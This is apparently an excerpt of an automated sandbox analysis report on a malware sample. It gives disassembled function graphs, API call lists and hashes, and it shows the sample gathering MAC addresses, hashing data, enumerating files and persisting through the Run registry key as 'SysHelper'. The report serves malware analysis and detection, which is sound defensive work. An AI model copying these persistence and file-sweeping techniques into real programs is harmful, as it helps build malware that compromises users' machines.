                                                                                                        • Opcode Fuzzy Hash: 0a807248b97e10f2b10fd081de65dde7e5f03e89b8ea2ad011bbf5291af09bc5
                                                                                                        • Instruction Fuzzy Hash: 61518E71D40219ABDB11DBA0DC46FEFBBB9FB04714F104026FA00F6280EB795A01ABA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1F730 Relevance: 29.2, APIs: 19, Instructions: 732COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00F21AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F21ACA
                                                                                                          • Part of subcall function 00F21AB0: DispatchMessageW.USER32(?), ref: 00F21AE0
                                                                                                          • Part of subcall function 00F21AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F21AEE
                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF,?,00000000), ref: 00F1F900
                                                                                                        • _memmove.LIBCMT ref: 00F1F9EA
                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 00F1FA51
                                                                                                        • _memmove.LIBCMT ref: 00F1FADA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                        • String ID:
                                                                                                        • API String ID: 273148273-0
                                                                                                        • Opcode ID: 0fd330e224efecb9876fb0f0eed36cebca2b52ea629d4f2d22157e6c0a99b9ce
                                                                                                        • Instruction ID: 8f53c32379d78565d111c0f711e72b843c251801086cca80e8aed1b708f16a25
                                                                                                        • Opcode Fuzzy Hash: 0fd330e224efecb9876fb0f0eed36cebca2b52ea629d4f2d22157e6c0a99b9ce
                                                                                                        • Instruction Fuzzy Hash: 8652DF71D00218DBDF10DFA8DC85BEEBBB4BF04318F108169E419A7251E779AA89DF91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1E870 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 165encryptionCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1885 f1e870-f1e8d6 call f256d0 CryptAcquireContextW 1888 f1e8e9-f1e901 CryptCreateHash 1885->1888 1889 f1e8d8-f1e8e4 call f40eca 1885->1889 1891 f1e903-f1e90f call f40eca 1888->1891 1892 f1e914-f1e930 CryptHashData 1888->1892 1889->1888 1891->1892 1894 f1e943-f1e961 CryptGetHashParam 1892->1894 1895 f1e932-f1e93e call f40eca 1892->1895 1897 f1e963-f1e96f call f40eca 1894->1897 1898 f1e974-f1e9a6 call f30be4 call f3b420 CryptGetHashParam 1894->1898 1895->1894 1897->1898 1904 f1e9b9-f1e9bb 1898->1904 1905 f1e9a8-f1e9b4 call f40eca 1898->1905 1907 f1e9c0-f1e9c3 1904->1907 1905->1904 1908 f1ea10-f1ea31 call f32110 CryptDestroyHash CryptReleaseContext 1907->1908 1909 f1e9c5-f1e9df call f304a6 1907->1909 1914 f1ea33-f1ea3b call f32587 1908->1914 1915 f1ea3e-f1ea50 1908->1915 1916 f1e9e1-f1e9f0 call f23ea0 1909->1916 1917 f1e9f2-f1e9f5 1909->1917 1914->1915 1916->1907 1920 f1e9f8-f1e9fd 1917->1920 1920->1920 1923 f1e9ff-f1ea0e call f23ea0 1920->1923 1923->1907
                                                                                                        APIs
                                                                                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,0100FCA4,00000000,00000000), ref: 00F1E8CE
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1E8E4
                                                                                                          • Part of subcall function 00F40ECA: RaiseException.KERNEL32(?,?,00F5F299,?,?,?,?,?,?,?,00F5F299,?,01018238,?), ref: 00F40F1F
                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00F1E8F9
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1E90F
                                                                                                        • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 00F1E928
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1E93E
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 00F1E95D
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1E96F
                                                                                                        • _memset.LIBCMT ref: 00F1E98E
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00F1E9A2
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1E9B4
                                                                                                        • _sprintf.LIBCMT ref: 00F1E9D3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                                        • String ID: %.2X
                                                                                                        • API String ID: 1084002244-213608013
                                                                                                        • Opcode ID: 8f2235fb47de2201318033d2332ac8965008be072cefe07183b5a80b62f4de23
                                                                                                        • Instruction ID: 16a4efe6fb0f14cf6100e60de2b923045c20f32cb4ed2741543724dd51d707c1
                                                                                                        • Opcode Fuzzy Hash: 8f2235fb47de2201318033d2332ac8965008be072cefe07183b5a80b62f4de23
                                                                                                        • Instruction Fuzzy Hash: E6518071D40209ABDF11DFA0DC46FEEBBB9EB04714F10402AFA01B6181D779AA45EBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1EAA0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 159encryptionCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1926 f1eaa0-f1eb09 call f256d0 CryptAcquireContextW 1929 f1eb0b-f1eb17 call f40eca 1926->1929 1930 f1eb1c-f1eb34 CryptCreateHash 1926->1930 1929->1930 1932 f1eb47-f1eb56 CryptHashData 1930->1932 1933 f1eb36-f1eb42 call f40eca 1930->1933 1935 f1eb69-f1eb87 CryptGetHashParam 1932->1935 1936 f1eb58-f1eb64 call f40eca 1932->1936 1933->1932 1938 f1eb89-f1eb95 call f40eca 1935->1938 1939 f1eb9a-f1ebcc call f30be4 call f3b420 CryptGetHashParam 1935->1939 1936->1935 1938->1939 1945 f1ebdf 1939->1945 1946 f1ebce-f1ebda call f40eca 1939->1946 1948 f1ebe1-f1ebe4 1945->1948 1946->1945 1949 f1ebe6-f1ec00 call f304a6 1948->1949 1950 f1ec38-f1ec67 call f32110 CryptDestroyHash CryptReleaseContext 1948->1950 1955 f1ec13-f1ec19 1949->1955 1956 f1ec02-f1ec11 call f23ea0 1949->1956 1958 f1ec20-f1ec25 1955->1958 1956->1948 1958->1958 1960 f1ec27-f1ec36 call f23ea0 1958->1960 1960->1948
                                                                                                        APIs
                                                                                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,0100FCA4,00000000,00000000,00000000,?), ref: 00F1EB01
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1EB17
                                                                                                          • Part of subcall function 00F40ECA: RaiseException.KERNEL32(?,?,00F5F299,?,?,?,?,?,?,?,00F5F299,?,01018238,?), ref: 00F40F1F
                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00F1EB2C
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1EB42
                                                                                                        • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 00F1EB4E
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1EB64
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 00F1EB83
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1EB95
                                                                                                        • _memset.LIBCMT ref: 00F1EBB4
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00F1EBC8
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1EBDA
                                                                                                        • _sprintf.LIBCMT ref: 00F1EBF4
                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 00F1EC44
                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00F1EC4F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                                        • String ID: %.2X
                                                                                                        • API String ID: 1637485200-213608013
                                                                                                        • Opcode ID: ce144d2ad6e2a2645915cf99ba5a633d9d4d0a31b74af8f3b9fc8f51deb7ee48
                                                                                                        • Instruction ID: 5cd06d1a74f9279c372f32f22856cf4a39ee0d49a1b3346813bedd23dadfd69e
                                                                                                        • Opcode Fuzzy Hash: ce144d2ad6e2a2645915cf99ba5a633d9d4d0a31b74af8f3b9fc8f51deb7ee48
                                                                                                        • Instruction Fuzzy Hash: EA518371E44209ABDF11DBA1DC46FEEBBB9EB44714F10402AFA01B6180D7796A05EBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1E670 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 78COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1963 f1e670-f1e697 call f30c62 * 2 1968 f1e6b4-f1e6c2 GetAdaptersInfo 1963->1968 1969 f1e699-f1e6b3 call f31f2d call f30bed 1963->1969 1971 f1e6c4-f1e6d9 call f30bed call f30c62 1968->1971 1972 f1e6db-f1e6e8 GetAdaptersInfo 1968->1972 1971->1969 1971->1972 1973 f1e744-f1e754 call f30bed 1972->1973 1974 f1e6ea-f1e73c call f304a6 call f31f2d * 2 1972->1974 1989 f1e741 1974->1989 1989->1973
                                                                                                        APIs
                                                                                                        • _malloc.LIBCMT ref: 00F1E67F
                                                                                                          • Part of subcall function 00F30C62: __FF_MSGBANNER.LIBCMT ref: 00F30C79
                                                                                                          • Part of subcall function 00F30C62: __NMSG_WRITE.LIBCMT ref: 00F30C80
                                                                                                          • Part of subcall function 00F30C62: RtlAllocateHeap.NTDLL(00840000,00000000,00000001,00000001,?,?,?,00F40E81,00000001,00000000,?,?,?,00F40D1A,00F5F284,?), ref: 00F30CA5
                                                                                                        • _malloc.LIBCMT ref: 00F1E68B
                                                                                                        • _wprintf.LIBCMT ref: 00F1E69E
                                                                                                        • _free.LIBCMT ref: 00F1E6A4
                                                                                                          • Part of subcall function 00F30BED: RtlFreeHeap.NTDLL(00000000,00000000,?,00F3507F,00000000,00000001,00000000,?,?,?,00F40D1A,00F5F284,?), ref: 00F30C01
                                                                                                          • Part of subcall function 00F30BED: GetLastError.KERNEL32(00000000,?,00F3507F,00000000,00000001,00000000,?,?,?,00F40D1A,00F5F284,?), ref: 00F30C13
                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 00F1E6B9
                                                                                                        • _free.LIBCMT ref: 00F1E6C5
                                                                                                        • _malloc.LIBCMT ref: 00F1E6CD
                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 00F1E6E0
                                                                                                        • _sprintf.LIBCMT ref: 00F1E720
                                                                                                        • _wprintf.LIBCMT ref: 00F1E732
                                                                                                        • _wprintf.LIBCMT ref: 00F1E73C
                                                                                                        • _free.LIBCMT ref: 00F1E745
                                                                                                        Strings
                                                                                                        • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 00F1E71A
                                                                                                        • Address: %s, mac: %s, xrefs: 00F1E72D
                                                                                                        • Error allocating memory needed to call GetAdaptersinfo, xrefs: 00F1E699
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                                                                                        • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                                        • API String ID: 3901070236-1604013687
                                                                                                        • Opcode ID: d0cd862c40996cc521ae95a74597295421176abb632ab05f78e2894648724398
                                                                                                        • Instruction ID: 7c93f966713febd6f43837ff1c67571cdba138d5d79d14714c1f8548c3f89b77
                                                                                                        • Opcode Fuzzy Hash: d0cd862c40996cc521ae95a74597295421176abb632ab05f78e2894648724398
                                                                                                        • Instruction Fuzzy Hash: 411106B29045587AD272A3B55C12EFF76EC8F46761F08016AFECCD5141EA5C5A01B3B1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1FB98 Relevance: 15.3, APIs: 10, Instructions: 266stringCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 2367 f1fb98-f1fb9f 2368 f1fba0-f1fbb9 2367->2368 2368->2368 2369 f1fbbb-f1fbcf 2368->2369 2370 f1fbd1 2369->2370 2371 f1fbd3-f1fc02 PathAppendW call f28400 2369->2371 2370->2371 2374 f1fc04-f1fc0c call f32587 2371->2374 2375 f1fc0f-f1fc29 2371->2375 2374->2375 2377 f1fc49-f1fc4c 2375->2377 2378 f1fc2b-f1fc2f 2375->2378 2381 f1fc4f-f1fc6b PathFileExistsW 2377->2381 2380 f1fc31-f1fc47 call f305a0 2378->2380 2378->2381 2380->2381 2383 f1fc6d-f1fc86 call f30c62 2381->2383 2384 f1fcdf-f1fce5 2381->2384 2393 f1fc88 2383->2393 2394 f1fc8a-f1fc9f lstrcpyW 2383->2394 2386 f1fcf0-f1fd07 call f27140 2384->2386 2387 f1fce7-f1fced call f32587 2384->2387 2396 f1fd09 2386->2396 2397 f1fd0b-f1fd20 FindFirstFileW 2386->2397 2387->2386 2393->2394 2398 f1fca1 2394->2398 2399 f1fca3-f1fcdc lstrcatW call f24690 call f1f0e0 call f30bed 2394->2399 2396->2397 2400 f1fd30-f1fd4c 2397->2400 2401 f1fd22-f1fd2d call f32587 2397->2401 2398->2399 2399->2384 2405 f20072-f20076 2400->2405 2406 f1fd52-f1fd55 2400->2406 2401->2400 2407 f20086-f200a4 2405->2407 2408 f20078-f20083 call f32587 2405->2408 2411 f1fd60-f1fd6b 2406->2411 2413 f200b1-f200c9 2407->2413 2414 f200a6-f200ae call f32587 2407->2414 2408->2407 2416 f1fd70-f1fd76 2411->2416 2420 f200d6-f200ee 2413->2420 2421 f200cb-f200d3 call f32587 2413->2421 2414->2413 2422 f1fd96-f1fd98 2416->2422 2423 f1fd78-f1fd7b 2416->2423 2435 f200f0-f200f8 call f32587 2420->2435 2436 f200fb-f2010b 2420->2436 2421->2420 2424 f1fd9b-f1fd9d 2422->2424 2428 f1fd92-f1fd94 2423->2428 2429 f1fd7d-f1fd85 2423->2429 2431 f20052-f20065 FindNextFileW 2424->2431 2432 f1fda3-f1fdae 2424->2432 2428->2424 2429->2422 2434 f1fd87-f1fd90 2429->2434 2431->2411 2437 f2006b-f2006c FindClose 2431->2437 2439 f1fdb0-f1fdb6 2432->2439 2434->2416 2434->2428 2435->2436 2437->2405 2441 f1fdd6-f1fdd8 2439->2441 2442 f1fdb8-f1fdbb 2439->2442 2445 f1fddb-f1fddd 2441->2445 2443 f1fdd2-f1fdd4 2442->2443 2444 f1fdbd-f1fdc5 2442->2444 2443->2445 2444->2441 2446 f1fdc7-f1fdd0 2444->2446 2445->2431 2447 f1fde3-f1fdea 2445->2447 2446->2439 2446->2443 2448 f1fdf0-f1fe71 call f27140 call f25ae0 call f24690 call f23b70 2447->2448 2449 f1fec2-f1fecc 2447->2449 2471 f1fe81-f1fea9 2448->2471 2472 f1fe73-f1fe7e call f32587 2448->2472 2451 f1feda-f1fede 2449->2451 2452 f1fece-f1fed5 call f21ab0 2449->2452 2451->2431 2455 f1fee4-f1ff13 call f24690 2451->2455 2452->2451 2460 f1ff15-f1ff17 2455->2460 2461 f1ff19-f1ff1f 2455->2461 2464 f1ff31-f1ff6a call f25ae0 PathFindExtensionW 2460->2464 2465 f1ff22-f1ff2b 2461->2465 2473 f1ff9a-f1ffa8 2464->2473 2474 f1ff6c 2464->2474 2465->2465 2467 f1ff2d-f1ff2f 2465->2467 2467->2464 2471->2431 2478 f1feaf-f1febd call f32587 2471->2478 2472->2471 2476 f1ffda-f1ffde 2473->2476 2477 f1ffaa 2473->2477 2479 f1ff70-f1ff74 2474->2479 2485 f1ffe0-f1ffe9 2476->2485 2486 f2003a-f20042 2476->2486 2481 f1ffb0-f1ffb4 2477->2481 2478->2431 2483 f1ff76-f1ff78 2479->2483 2484 f1ff7a 2479->2484 2487 f1ffb6-f1ffb8 2481->2487 2488 f1ffba 2481->2488 2490 f1ff7c-f1ff88 call f31c02 2483->2490 2484->2490 2493 f1ffeb 2485->2493 2494 f1ffed-f1fff9 call f31c02 2485->2494 2491 f20044-f2004c call f32587 2486->2491 2492 f2004f 2486->2492 2496 f1ffbc-f1ffce call f31c02 2487->2496 2488->2496 2505 f1ff93 2490->2505 2506 f1ff8a-f1ff8f 2490->2506 2491->2492 2492->2431 2493->2494 2494->2486 2503 f1fffb-f2000b 2494->2503 2496->2486 2511 f1ffd0-f1ffd5 2496->2511 2509 f2000f-f20026 call f31c02 2503->2509 2510 f2000d 2503->2510 2508 f1ff97 2505->2508 2506->2479 2507 f1ff91 2506->2507 2507->2508 2508->2473 2509->2486 2515 f20028-f20035 call f211c0 2509->2515 2510->2509 2511->2481 2513 f1ffd7 2511->2513 2513->2476 2515->2486
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3232302685-0
                                                                                                        • Opcode ID: 4e3871009982f65ed5fd920007ed9eeae9bdb4513aaa241a09f8b7fb8e706679
                                                                                                        • Instruction ID: ba34a8ae6d03209255882d96c0aee3f65dc5c4c5cb6e0c7a9d981bdedc1ca409
                                                                                                        • Opcode Fuzzy Hash: 4e3871009982f65ed5fd920007ed9eeae9bdb4513aaa241a09f8b7fb8e706679
                                                                                                        • Instruction Fuzzy Hash: 0AB1CD71D00219DBDF20DFA4DC45BEEB7B5BF14318F104069E409AB252EB359A89EF92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F21CD0 Relevance: 79.1, APIs: 36, Strings: 9, Instructions: 382stringregistrylibraryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 985 f21cd0-f21d1a call f3f7c0 RegOpenKeyExW 988 f21d20-f21d8d call f3b420 RegQueryValueExW RegCloseKey 985->988 989 f22207-f22216 985->989 992 f21d93-f21d9c 988->992 993 f21d8f-f21d91 988->993 995 f21da0-f21da9 992->995 994 f21daf-f21dcb call f25c10 993->994 999 f21dd1-f21df8 lstrlenA call f23520 994->999 1000 f21e7c-f21e87 994->1000 995->995 996 f21dab-f21dad 995->996 996->994 1007 f21dfa-f21dfe 999->1007 1008 f21e28-f21e2c 999->1008 1002 f21e94-f21f34 LoadLibraryW GetProcAddress GetCommandLineW CommandLineToArgvW lstrcpyW PathFindFileNameW UuidCreate UuidToStringW 1000->1002 1003 f21e89-f21e91 call f32587 1000->1003 1012 f21f36-f21f38 1002->1012 1013 f21f3a-f21f3f 1002->1013 1003->1002 1014 f21e00-f21e08 call f32587 1007->1014 1015 f21e0b-f21e23 call f245a0 1007->1015 1010 f21e2e-f21e39 call f32587 1008->1010 1011 f21e3c-f21e50 PathFileExistsW 1008->1011 1010->1011 1011->1000 1020 f21e52-f21e57 1011->1020 1018 f21f4f-f21f96 call f25c10 RpcStringFreeW PathAppendW CreateDirectoryW 1012->1018 1019 f21f40-f21f49 1013->1019 1014->1015 1015->1008 1032 f21f98-f21fa0 1018->1032 1033 f21fce-f21fe9 1018->1033 1019->1019 1023 f21f4b-f21f4d 1019->1023 1024 f21e6a-f21e6e 1020->1024 1025 f21e59-f21e5e 1020->1025 1023->1018 1024->989 1030 f21e74-f21e77 1024->1030 1025->1024 1028 f21e60-f21e65 call f24690 1025->1028 1028->1024 1034 f221ff-f22204 call f32587 1030->1034 1037 f21fa2-f21fa4 1032->1037 1038 f21fa6-f21faf 1032->1038 1035 f21feb-f21fed 1033->1035 1036 f21fef-f21ff8 1033->1036 1034->989 1040 f2200f-f22076 call f25c10 PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 1035->1040 1041 f22000-f22009 1036->1041 1042 f21fbf-f21fc9 call f25c10 1037->1042 1044 f21fb0-f21fb9 1038->1044 1050 f221d1-f221d5 1040->1050 1051 f2207c-f22107 call f3b420 lstrcpyW lstrcatW * 2 lstrlenW RegSetValueExW RegCloseKey 1040->1051 1041->1041 1046 f2200b-f2200d 1041->1046 1042->1033 1044->1044 1048 f21fbb-f21fbd 1044->1048 1046->1040 1048->1042 1052 f221e2-f221fa 1050->1052 1053 f221d7-f221df call f32587 1050->1053 1059 f22115-f221a8 call f3b420 SetLastError lstrcpyW lstrcatW * 2 CreateProcessW 1051->1059 1060 f22109-f22110 call f23260 1051->1060 1052->989 1056 f221fc 1052->1056 1053->1052 1056->1034 1064 f221b2-f221b8 1059->1064 1065 f221aa-f221b0 GetLastError 1059->1065 1060->1059 1066 f221c0-f221cf WaitForSingleObject 1064->1066 1065->1050 1066->1050 1066->1066
                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,00FDAC68,000000FF), ref: 00F21D12
                                                                                                        • _memset.LIBCMT ref: 00F21D3B
                                                                                                        • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00F21D63
                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FDAC68,000000FF), ref: 00F21D6C
                                                                                                        • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00F21DD6
                                                                                                        • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00F21E48
                                                                                                        • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00F21E99
                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00F21EA5
                                                                                                        • GetCommandLineW.KERNEL32 ref: 00F21EB4
                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00F21EBF
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F21ECE
                                                                                                        • PathFindFileNameW.SHLWAPI(?), ref: 00F21EDB
                                                                                                        • UuidCreate.RPCRT4(?), ref: 00F21EFC
                                                                                                        • UuidToStringW.RPCRT4(?,?), ref: 00F21F14
                                                                                                        • RpcStringFreeW.RPCRT4(00000000), ref: 00F21F64
                                                                                                        • PathAppendW.SHLWAPI(?,?), ref: 00F21F83
                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F21F8E
